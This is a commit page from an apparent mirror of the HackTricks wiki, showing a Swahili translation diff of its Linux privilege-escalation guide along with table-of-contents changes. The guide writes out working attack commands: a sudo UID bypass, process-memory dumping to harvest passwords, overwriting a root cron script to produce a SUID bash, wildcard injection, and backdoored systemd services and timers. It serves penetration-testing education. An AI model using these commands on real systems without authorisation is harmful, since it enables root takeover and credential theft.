mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/linux-hardening/privilege-escalation/README.md'] to sw
This commit is contained in:
		
							parent
							
								
									0dc09b4da6
								
							
						
					
					
						commit
						d012ba79c8
					
				@ -793,6 +793,29 @@
 | 
			
		||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
 | 
			
		||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
 | 
			
		||||
 | 
			
		||||
# 🤖 AI
 | 
			
		||||
- [AI Security](AI/README.md)
 | 
			
		||||
  - [AI Security Methodology](AI/AI-Deep-Learning.md)
 | 
			
		||||
  - [AI MCP Security](AI/AI-MCP-Servers.md)
 | 
			
		||||
  - [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
 | 
			
		||||
  - [AI Models RCE](AI/AI-Models-RCE.md)
 | 
			
		||||
  - [AI Prompts](AI/AI-Prompts.md)
 | 
			
		||||
  - [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
 | 
			
		||||
  - [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
 | 
			
		||||
  - [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
 | 
			
		||||
  - [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
 | 
			
		||||
  - [LLM Training](AI/AI-llm-architecture/README.md)
 | 
			
		||||
    - [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
 | 
			
		||||
    - [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
 | 
			
		||||
    - [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
 | 
			
		||||
    - [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
 | 
			
		||||
    - [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
 | 
			
		||||
    - [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
 | 
			
		||||
    - [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
 | 
			
		||||
    - [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
 | 
			
		||||
    - [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
 | 
			
		||||
    - [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)
 | 
			
		||||
 | 
			
		||||
# 🔩 Reversing
 | 
			
		||||
 | 
			
		||||
- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
 | 
			
		||||
@ -850,17 +873,6 @@
 | 
			
		||||
  - [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
 | 
			
		||||
  - [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
 | 
			
		||||
- [Test LLMs](todo/test-llms.md)
 | 
			
		||||
- [LLM Training](todo/llm-training-data-preparation/README.md)
 | 
			
		||||
  - [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
 | 
			
		||||
  - [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
 | 
			
		||||
  - [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
 | 
			
		||||
  - [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
 | 
			
		||||
  - [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
 | 
			
		||||
  - [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
 | 
			
		||||
  - [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
 | 
			
		||||
  - [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
 | 
			
		||||
  - [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
 | 
			
		||||
  - [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
 | 
			
		||||
- [Burp Suite](todo/burp-suite.md)
 | 
			
		||||
- [Other Web Tricks](todo/other-web-tricks.md)
 | 
			
		||||
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
 | 
			
		||||
 | 
			
		||||
@ -2,11 +2,11 @@
 | 
			
		||||
 | 
			
		||||
{{#include ../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
## Taarifa za Mfumo
 | 
			
		||||
## System Information
 | 
			
		||||
 | 
			
		||||
### Taarifa za OS
 | 
			
		||||
### OS info
 | 
			
		||||
 | 
			
		||||
Hebu tuanze kupata maarifa kuhusu OS inayotembea
 | 
			
		||||
Tuanzishe kupata maarifa kuhusu OS inayotumika
 | 
			
		||||
```bash
 | 
			
		||||
(cat /proc/version || uname -a ) 2>/dev/null
 | 
			
		||||
lsb_release -a 2>/dev/null # old, not by default on many systems
 | 
			
		||||
@ -26,7 +26,7 @@ Habari za kuvutia, nywila au funguo za API katika mabadiliko ya mazingira?
 | 
			
		||||
```
 | 
			
		||||
### Kernel exploits
 | 
			
		||||
 | 
			
		||||
Angalia toleo la kernel na ikiwa kuna exploit ambayo inaweza kutumika kuongeza mamlaka
 | 
			
		||||
Angalia toleo la kernel na ikiwa kuna exploit ambayo inaweza kutumika kuongeza mamlaka.
 | 
			
		||||
```bash
 | 
			
		||||
cat /proc/version
 | 
			
		||||
uname -a
 | 
			
		||||
@ -73,9 +73,9 @@ Kutoka @sickrov
 | 
			
		||||
```
 | 
			
		||||
sudo -u#-1 /bin/bash
 | 
			
		||||
```
 | 
			
		||||
### Dmesg signature verification failed
 | 
			
		||||
### Dmesg saini ya uthibitisho imefeli
 | 
			
		||||
 | 
			
		||||
Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited
 | 
			
		||||
Angalia **smasher2 box ya HTB** kwa **mfano** wa jinsi hii vuln inaweza kutumika.
 | 
			
		||||
```bash
 | 
			
		||||
dmesg 2>/dev/null | grep "signature"
 | 
			
		||||
```
 | 
			
		||||
@ -131,7 +131,7 @@ docker-security/
 | 
			
		||||
 | 
			
		||||
## Drives
 | 
			
		||||
 | 
			
		||||
Angalia **kitu gani kimewekwa na kisichoweza kuwekwa**, wapi na kwa nini. Ikiwa chochote hakijawa kimewekwa unaweza kujaribu kukiweka na kuangalia taarifa za kibinafsi.
 | 
			
		||||
Angalia **kitu gani kimewekwa na kisichoweza kuwekwa**, wapi na kwa nini. Ikiwa chochote hakijawa kimewekwa unaweza kujaribu kukiweka na kuangalia taarifa za kibinafsi
 | 
			
		||||
```bash
 | 
			
		||||
ls /dev 2>/dev/null | grep -i "sd"
 | 
			
		||||
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
 | 
			
		||||
@ -144,42 +144,42 @@ Taja binaries muhimu
 | 
			
		||||
```bash
 | 
			
		||||
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
 | 
			
		||||
```
 | 
			
		||||
Pia, angalia kama **compiler yoyote imewekwa**. Hii ni muhimu ikiwa unahitaji kutumia exploit ya kernel kwani inashauriwa kuikamilisha kwenye mashine ambayo unakusudia kuitumia (au kwenye moja inayofanana)
 | 
			
		||||
Pia, angalia kama **compiler yoyote imewekwa**. Hii ni muhimu ikiwa unahitaji kutumia exploit ya kernel kwani inashauriwa kuikamilisha kwenye mashine ambayo unakusudia kuitumia (au kwenye moja inayofanana).
 | 
			
		||||
```bash
 | 
			
		||||
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
 | 
			
		||||
```
 | 
			
		||||
### Programu Zenye Uthibitisho Zilizowekwa
 | 
			
		||||
 | 
			
		||||
Angalia **toleo la vifurushi na huduma zilizowekwa**. Huenda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza kutumiwa kwa ajili ya kupandisha mamlaka...\
 | 
			
		||||
Inapendekezwa kuangalia kwa mikono toleo la programu zinazoshukiwa zaidi zilizowekwa.
 | 
			
		||||
Inapendekezwa kuangalia kwa mikono toleo la programu zinazoshuku zaidi zilizowekwa.
 | 
			
		||||
```bash
 | 
			
		||||
dpkg -l #Debian
 | 
			
		||||
rpm -qa #Centos
 | 
			
		||||
```
 | 
			
		||||
Ikiwa una ufikiaji wa SSH kwa mashine, unaweza pia kutumia **openVAS** kuangalia programu zilizopitwa na wakati na zenye udhaifu zilizowekwa ndani ya mashine.
 | 
			
		||||
 | 
			
		||||
> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha habari nyingi ambazo kwa kawaida zitakuwa hazina maana, kwa hivyo inapendekezwa kutumia programu kama OpenVAS au sawa na hiyo ambayo itakagua ikiwa toleo lolote la programu lililowekwa lina udhaifu kwa mashambulizi yanayojulikana._
 | 
			
		||||
> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha habari nyingi ambazo kwa kiasi kikubwa zitakuwa hazina maana, kwa hivyo inapendekezwa kutumia programu kama OpenVAS au sawa na hiyo ambayo itakagua ikiwa toleo lolote la programu lililowekwa lina udhaifu kwa mashambulizi yanayojulikana._
 | 
			
		||||
 | 
			
		||||
## Mchakato
 | 
			
		||||
 | 
			
		||||
Angalia **michakato** ipi inatekelezwa na uangalie ikiwa mchakato wowote una **haki zaidi kuliko inavyopaswa** (labda tomcat inatekelezwa na root?)
 | 
			
		||||
Angalia **michakato gani** inatekelezwa na uangalie ikiwa mchakato wowote una **privileges zaidi kuliko inavyopaswa** (labda tomcat inatekelezwa na root?)
 | 
			
		||||
```bash
 | 
			
		||||
ps aux
 | 
			
		||||
ps -ef
 | 
			
		||||
top -n 1
 | 
			
		||||
```
 | 
			
		||||
Daima angalia kwa [**electron/cef/chromium debuggers** zinazotembea, unaweza kuzitumia kuboresha mamlaka](electron-cef-chromium-debugger-abuse.md). **Linpeas** inagundua hizo kwa kuangalia parameter `--inspect` ndani ya mistari ya amri ya mchakato.\
 | 
			
		||||
Pia **angalia mamlaka yako juu ya binaries za michakato**, labda unaweza kuandika tena mtu mwingine.
 | 
			
		||||
Daima angalia kwa [**electron/cef/chromium debuggers** zinazotembea, unaweza kuzitumia kuboresha mamlaka](electron-cef-chromium-debugger-abuse.md). **Linpeas** inatambua hizo kwa kuangalia parameter ya `--inspect` ndani ya mistari ya amri ya mchakato.\
 | 
			
		||||
Pia **angalia mamlaka yako juu ya binaries za michakato**, labda unaweza kuandika upya mtu mwingine.
 | 
			
		||||
 | 
			
		||||
### Ufuatiliaji wa mchakato
 | 
			
		||||
 | 
			
		||||
Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa ya manufaa sana kutambua michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya mahitaji inatimizwa.
 | 
			
		||||
Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa muhimu sana kutambua michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya mahitaji inakamilishwa.
 | 
			
		||||
 | 
			
		||||
### Kumbukumbu ya mchakato
 | 
			
		||||
 | 
			
		||||
Huduma zingine za seva huhifadhi **nyaraka kwa maandiko wazi ndani ya kumbukumbu**.\
 | 
			
		||||
Kwa kawaida utahitaji **mamlaka ya root** kusoma kumbukumbu za michakato zinazomilikiwa na watumiaji wengine, kwa hivyo hii kwa kawaida ni ya manufaa zaidi unapokuwa tayari root na unataka kugundua nyaraka zaidi.\
 | 
			
		||||
Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma kumbukumbu za michakato unazomiliki**.
 | 
			
		||||
Kwa kawaida utahitaji **mamlaka ya root** kusoma kumbukumbu za michakato zinazomilikiwa na watumiaji wengine, kwa hivyo hii kwa kawaida ni muhimu zaidi unapokuwa tayari root na unataka kugundua nyaraka zaidi.\
 | 
			
		||||
Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma kumbukumbu za michakato unayomiliki**.
 | 
			
		||||
 | 
			
		||||
> [!WARNING]
 | 
			
		||||
> Kumbuka kwamba siku hizi mashine nyingi **haziruhusu ptrace kwa default** ambayo inamaanisha huwezi kutupa michakato mingine inayomilikiwa na mtumiaji wako asiye na mamlaka.
 | 
			
		||||
@ -189,7 +189,7 @@ Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma kumbukumbu
 | 
			
		||||
> - **kernel.yama.ptrace_scope = 0**: michakato yote inaweza kufuatiliwa, mradi tu zina uid sawa. Hii ndiyo njia ya kawaida jinsi ptracing ilivyofanya kazi.
 | 
			
		||||
> - **kernel.yama.ptrace_scope = 1**: mchakato wa mzazi tu unaweza kufuatiliwa.
 | 
			
		||||
> - **kernel.yama.ptrace_scope = 2**: Ni admin tu anayeweza kutumia ptrace, kwani inahitaji uwezo wa CAP_SYS_PTRACE.
 | 
			
		||||
> - **kernel.yama.ptrace_scope = 3**: Hakuna michakato inayoweza kufuatiliwa kwa ptrace. Mara ikipangwa, inahitajika kuanzisha upya ili kuwezesha ptracing tena.
 | 
			
		||||
> - **kernel.yama.ptrace_scope = 3**: Hakuna michakato inayoweza kufuatiliwa kwa ptrace. Mara ikisetwa, upya unahitajika ili kuwezesha ptracing tena.
 | 
			
		||||
 | 
			
		||||
#### GDB
 | 
			
		||||
 | 
			
		||||
@ -215,7 +215,7 @@ done
 | 
			
		||||
```
 | 
			
		||||
#### /proc/$pid/maps & /proc/$pid/mem
 | 
			
		||||
 | 
			
		||||
Kwa kitambulisho cha mchakato kilichotolewa, **ramani zinaonyesha jinsi kumbukumbu inavyopangwa ndani ya nafasi ya anwani ya mchakato huo**; pia inaonyesha **idhini za kila eneo lililopangwa**. Faili ya pseudo **mem inafichua kumbukumbu ya michakato yenyewe**. Kutoka kwenye faili la **ramani** tunajua ni **mikoa ya kumbukumbu gani zinazoweza kusomwa** na offsets zao. Tunatumia taarifa hii **kutafuta ndani ya faili la mem na kutupa maeneo yote yanayoweza kusomwa** kwenye faili.
 | 
			
		||||
Kwa kitambulisho cha mchakato kilichotolewa, **ramani zinaonyesha jinsi kumbukumbu inavyopangwa ndani ya nafasi ya anwani ya virtual ya mchakato huo**; pia inaonyesha **idhini za kila eneo lililopangwa**. Faili ya **mem** pseudo **inaonyesha kumbukumbu ya michakato yenyewe**. Kutoka kwenye faili la **ramani** tunajua ni **mikoa ya kumbukumbu ambayo inaweza kusomwa** na offsets zao. Tunatumia taarifa hii **kutafuta ndani ya faili la mem na kutupa maeneo yote yanayoweza kusomwa** kwenye faili.
 | 
			
		||||
```bash
 | 
			
		||||
procdump()
 | 
			
		||||
(
 | 
			
		||||
@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS
 | 
			
		||||
```
 | 
			
		||||
### ProcDump kwa linux
 | 
			
		||||
 | 
			
		||||
ProcDump ni toleo jipya la Linux la chombo cha ProcDump cha jadi kutoka kwa seti ya zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
 | 
			
		||||
ProcDump ni toleo jipya la Linux la chombo cha ProcDump kutoka kwa seti ya zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
 | 
			
		||||
```
 | 
			
		||||
procdump -p 1714
 | 
			
		||||
 | 
			
		||||
@ -281,7 +281,7 @@ Ikiwa unapata kwamba mchakato wa uthibitishaji unafanya kazi:
 | 
			
		||||
ps -ef | grep "authenticator"
 | 
			
		||||
root      2027  2025  0 11:46 ?        00:00:00 authenticator
 | 
			
		||||
```
 | 
			
		||||
Unaweza kutoa mchakato (angalia sehemu za awali ili kupata njia tofauti za kutoa kumbukumbu ya mchakato) na kutafuta ithibati ndani ya kumbukumbu:
 | 
			
		||||
Unaweza kutoa mchakato (angalia sehemu za awali ili kupata njia tofauti za kutoa kumbukumbu ya mchakato) na kutafuta hati za kuingia ndani ya kumbukumbu:
 | 
			
		||||
```bash
 | 
			
		||||
./dump-memory.sh 2027
 | 
			
		||||
strings *.dump | grep -i password
 | 
			
		||||
@ -296,8 +296,8 @@ Chombo [**https://github.com/huntergregal/mimipenguin**](https://github.com/hunt
 | 
			
		||||
| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
 | 
			
		||||
| LightDM (Ubuntu Desktop)                          | lightdm              |
 | 
			
		||||
| VSFTPd (Mawasiliano ya FTP Yanayoendelea)        | vsftpd               |
 | 
			
		||||
| Apache2 (Mawasiliano ya HTTP Basic Auth Yanayoendelea) | apache2              |
 | 
			
		||||
| OpenSSH (Mawasiliano ya SSH Yanayoendelea - Matumizi ya Sudo) | sshd:                |
 | 
			
		||||
| Apache2 (Mikutano ya HTTP Basic Auth Inayoendelea)| apache2              |
 | 
			
		||||
| OpenSSH (Mikutano ya SSH Inayoendelea - Matumizi ya Sudo) | sshd:                |
 | 
			
		||||
 | 
			
		||||
#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
 | 
			
		||||
```bash
 | 
			
		||||
@ -336,11 +336,11 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
 | 
			
		||||
```
 | 
			
		||||
### Cron kutumia skripti yenye wildcard (Wildcard Injection)
 | 
			
		||||
 | 
			
		||||
Ikiwa skripti inatekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia hii kufanya mambo yasiyotarajiwa (kama privesc). Mfano:
 | 
			
		||||
Ikiwa skripti inayotekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia hii kufanya mambo yasiyotarajiwa (kama privesc). Mfano:
 | 
			
		||||
```bash
 | 
			
		||||
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
 | 
			
		||||
```
 | 
			
		||||
**Ikiwa wildcard imeandamana na njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **siyo).**
 | 
			
		||||
**Ikiwa wildcard inatanguliwa na njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **siyo).**
 | 
			
		||||
 | 
			
		||||
Soma ukurasa ufuatao kwa mbinu zaidi za unyakuzi wa wildcard:
 | 
			
		||||
 | 
			
		||||
@ -350,19 +350,19 @@ wildcards-spare-tricks.md
 | 
			
		||||
 | 
			
		||||
### Kuandika tena skripti ya Cron na symlink
 | 
			
		||||
 | 
			
		||||
Ikiwa unaweza **kubadilisha skripti ya cron** inayotekelezwa na root, unaweza kupata shell kwa urahisi sana:
 | 
			
		||||
Ikiwa **unaweza kubadilisha skripti ya cron** inayotekelezwa na root, unaweza kupata shell kwa urahisi sana:
 | 
			
		||||
```bash
 | 
			
		||||
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
 | 
			
		||||
#Wait until it is executed
 | 
			
		||||
/tmp/bash -p
 | 
			
		||||
```
 | 
			
		||||
Ikiwa script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, huenda ikawa na manufaa kufuta folda hiyo na **kuunda folda ya symlink kwa nyingine** inayohudumia script inayodhibitiwa na wewe
 | 
			
		||||
Ikiwa script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, huenda ikawa na manufaa kufuta folda hiyo na **kuunda folda ya symlink kwa folda nyingine** inayohudumia script inayodhibitiwa na wewe.
 | 
			
		||||
```bash
 | 
			
		||||
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
 | 
			
		||||
```
 | 
			
		||||
### Kazi za cron za mara kwa mara
 | 
			
		||||
 | 
			
		||||
Unaweza kufuatilia michakato ili kutafuta michakato inayotekelezwa kila dakika 1, 2 au 5. Huenda ukatumia fursa hii na kupandisha mamlaka.
 | 
			
		||||
Unaweza kufuatilia michakato ili kutafuta michakato inayotekelezwa kila dakika 1, 2 au 5. Huenda ukatumia fursa hiyo na kupandisha mamlaka.
 | 
			
		||||
 | 
			
		||||
Kwa mfano, ili **kufuatilia kila 0.1s kwa dakika 1**, **panga kwa amri zilizotekelezwa kidogo** na uondoe amri ambazo zimekuwa zikitekelezwa zaidi, unaweza kufanya:
 | 
			
		||||
```bash
 | 
			
		||||
@ -380,7 +380,7 @@ Inawezekana kuunda kazi ya cron **kwa kuweka kurudi kwa gari baada ya maoni** (b
 | 
			
		||||
 | 
			
		||||
### Writable _.service_ files
 | 
			
		||||
 | 
			
		||||
Angalia kama unaweza kuandika faili zozote za `.service`, ikiwa unaweza, unaweza **kubadilisha** ili **itekeleze** backdoor yako wakati huduma inapo **anzishwa**, **kurejelewa** au **kusitishwa** (labda utahitaji kusubiri hadi mashine ireboot).\
 | 
			
		||||
Angalia kama unaweza kuandika faili zozote za `.service`, ikiwa unaweza, unaweza **kubadilisha** ili **itekeleze** backdoor yako wakati huduma inapo **anzishwa**, **kurejelewa** au **kusitishwa** (labda utahitaji kusubiri hadi mashine irejelewe).\
 | 
			
		||||
Kwa mfano, tengeneza backdoor yako ndani ya faili .service na **`ExecStart=/tmp/script.sh`**
 | 
			
		||||
 | 
			
		||||
### Writable service binaries
 | 
			
		||||
@ -393,7 +393,7 @@ Unaweza kuona PATH inayotumika na **systemd** na:
 | 
			
		||||
```bash
 | 
			
		||||
systemctl show-environment
 | 
			
		||||
```
 | 
			
		||||
Ikiwa unapata kwamba unaweza **kuandika** katika yoyote ya folda za njia hiyo unaweza kuwa na uwezo wa **kuinua mamlaka**. Unahitaji kutafuta **njia za uhusiano zinazotumika kwenye faili za usanidi wa huduma** kama:
 | 
			
		||||
Ikiwa utagundua kuwa unaweza **kuandika** katika yoyote ya folda za njia hiyo unaweza kuwa na uwezo wa **kuinua mamlaka**. Unahitaji kutafuta **njia za uhusiano zinazotumika kwenye faili za usanidi wa huduma** kama:
 | 
			
		||||
```bash
 | 
			
		||||
ExecStart=faraday-server
 | 
			
		||||
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
 | 
			
		||||
@ -407,7 +407,7 @@ Kisha, tengeneza **executable** yenye **jina sawa na njia ya binary** ndani ya f
 | 
			
		||||
 | 
			
		||||
**Timers** ni faili za kitengo cha systemd ambazo jina lake linamalizika kwa `**.timer**` ambazo zinadhibiti faili za `**.service**` au matukio. **Timers** zinaweza kutumika kama mbadala wa cron kwani zina msaada wa ndani kwa matukio ya wakati wa kalenda na matukio ya wakati wa monotonic na zinaweza kuendeshwa kwa njia isiyo ya sambamba.
 | 
			
		||||
 | 
			
		||||
Unaweza kuorodhesha timers zote kwa:
 | 
			
		||||
Unaweza kuhesabu timers zote kwa:
 | 
			
		||||
```bash
 | 
			
		||||
systemctl list-timers --all
 | 
			
		||||
```
 | 
			
		||||
@ -417,9 +417,9 @@ Ikiwa unaweza kubadilisha timer unaweza kufanya iweze kutekeleza baadhi ya matuk
 | 
			
		||||
```bash
 | 
			
		||||
Unit=backdoor.service
 | 
			
		||||
```
 | 
			
		||||
Katika hati unaweza kusoma kuhusu kile Unit ni:
 | 
			
		||||
Katika hati unaweza kusoma kuhusu kile ambacho Kitengo ni:
 | 
			
		||||
 | 
			
		||||
> Kitengo cha kuamsha wakati kipima muda hiki kinapokamilika. Hoja ni jina la kitengo, ambacho kiambishi chake si ".timer". Ikiwa hakijasemwa, thamani hii inarudi kwa huduma ambayo ina jina sawa na kitengo cha kipima muda, isipokuwa kwa kiambishi. (Tazama hapo juu.) Inapendekezwa kwamba jina la kitengo linaloamshwa na jina la kitengo cha kipima muda liwe sawa, isipokuwa kwa kiambishi.
 | 
			
		||||
> Kitengo cha kuamsha wakati kipima muda hiki kinapokamilika. Hoja ni jina la kitengo, ambacho kiambishi chake si ".timer". Ikiwa hakijasemwa, thamani hii inarudi kwa huduma ambayo ina jina sawa na kitengo cha kipima muda, isipokuwa kwa kiambishi. (Tazama hapo juu.) Inapendekezwa kwamba jina la kitengo kinachowashwa na jina la kitengo cha kipima muda liwe sawa, isipokuwa kwa kiambishi.
 | 
			
		||||
 | 
			
		||||
Kwa hivyo, ili kutumia ruhusa hii unahitaji:
 | 
			
		||||
 | 
			
		||||
@ -439,26 +439,26 @@ Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd
 | 
			
		||||
 | 
			
		||||
## Sockets
 | 
			
		||||
 | 
			
		||||
Unix Domain Sockets (UDS) enable **process communication** on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through `.socket` files.
 | 
			
		||||
Unix Domain Sockets (UDS) enable **mwasiliano wa mchakato** kwenye mashine sawa au tofauti ndani ya mifano ya mteja-server. Wanatumia faili za kawaida za Unix descriptor kwa mawasiliano kati ya kompyuta na zimewekwa kupitia faili za `.socket`.
 | 
			
		||||
 | 
			
		||||
Sockets can be configured using `.socket` files.
 | 
			
		||||
Sockets zinaweza kuundwa kwa kutumia faili za `.socket`.
 | 
			
		||||
 | 
			
		||||
**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured:
 | 
			
		||||
**Jifunze zaidi kuhusu sockets na `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vya kuvutia vinaweza kuundwa:
 | 
			
		||||
 | 
			
		||||
- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hizi ni chaguzi tofauti lakini muhtasari unatumiwa ku **onyesha wapi itasikiliza** kwenye socket (njia ya faili la socket la AF_UNIX, IPv4/6 na/au nambari ya bandari ya kusikiliza, nk.)
 | 
			
		||||
- `Accept`: Inachukua hoja ya boolean. Ikiwa **kweli**, **kituo cha huduma kinazaliwa kwa kila muunganisho unaokuja** na socket ya muunganisho pekee inapitishwa kwake. Ikiwa **false**, sockets zote zinazolisikiliza zenyewe zinapitishwa kwa **kitengo cha huduma kilichozinduliwa**, na kitengo kimoja cha huduma kinazaliwa kwa muunganisho wote. Thamani hii inapuuziliwa mbali kwa sockets za datagram na FIFOs ambapo kitengo kimoja cha huduma kinashughulikia bila masharti trafiki yote inayokuja. **Inarudi kwa false**. Kwa sababu za utendaji, inapendekezwa kuandika daemons mpya tu kwa njia inayofaa kwa `Accept=no`.
 | 
			
		||||
- `ExecStartPre`, `ExecStartPost`: Inachukua mistari moja au zaidi ya amri, ambazo zina **tekelezwa kabla** au **baada** ya **sockets**/FIFOs zinazolisikiliza **kuundwa** na kufungwa, mtawalia. Token ya kwanza ya mstari wa amri lazima iwe jina la faili la moja kwa moja, kisha ikifuatwa na hoja za mchakato.
 | 
			
		||||
- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zina **tekelezwa kabla** au **baada** ya **sockets**/FIFOs zinazolisikiliza **kufungwa** na kuondolewa, mtawalia.
 | 
			
		||||
- `Service`: Inabainisha jina la **kitengo cha huduma** **kuanzisha** kwenye **trafiki inayokuja**. Mpangilio huu unaruhusiwa tu kwa sockets zenye Accept=no. Inarudi kwa huduma ambayo ina jina sawa na socket (ikiwa na kiambishi kilichobadilishwa). Katika hali nyingi, haitakuwa lazima kutumia chaguo hili.
 | 
			
		||||
- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti lakini muhtasari unatumiwa ku **onyesha wapi itasikiliza** socket (njia ya faili la socket la AF_UNIX, IPv4/6 na/au nambari ya bandari ya kusikiliza, nk.)
 | 
			
		||||
- `Accept`: Inachukua hoja ya boolean. Ikiwa **kweli**, **kigezo cha huduma kinazaliwa kwa kila muunganisho unaokuja** na socket ya muunganisho pekee inapitishwa kwake. Ikiwa **uongo**, sockets zote zinazokisikiliza zenyewe zinapitishwa kwa **kitengo cha huduma kilichozinduliwa**, na kitengo kimoja cha huduma kinazaliwa kwa muunganisho wote. Thamani hii inapuuziliwa mbali kwa sockets za datagram na FIFOs ambapo kitengo kimoja cha huduma kinashughulikia bila masharti trafiki yote inayokuja. **Inarudiwa kuwa uongo**. Kwa sababu za utendaji, inapendekezwa kuandika daemons mpya tu kwa njia inayofaa kwa `Accept=no`.
 | 
			
		||||
- `ExecStartPre`, `ExecStartPost`: Inachukua mistari moja au zaidi ya amri, ambazo zina **tekelezwa kabla** au **baada** ya **sockets**/FIFOs zinazokisikiliza ku **undwa** na kuunganishwa, mtawalia. Token ya kwanza ya mstari wa amri lazima iwe jina la faili la moja kwa moja, kisha ikifuatwa na hoja za mchakato.
 | 
			
		||||
- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zina **tekelezwa kabla** au **baada** ya **sockets**/FIFOs zinazokisikiliza ku **fungwa** na kuondolewa, mtawalia.
 | 
			
		||||
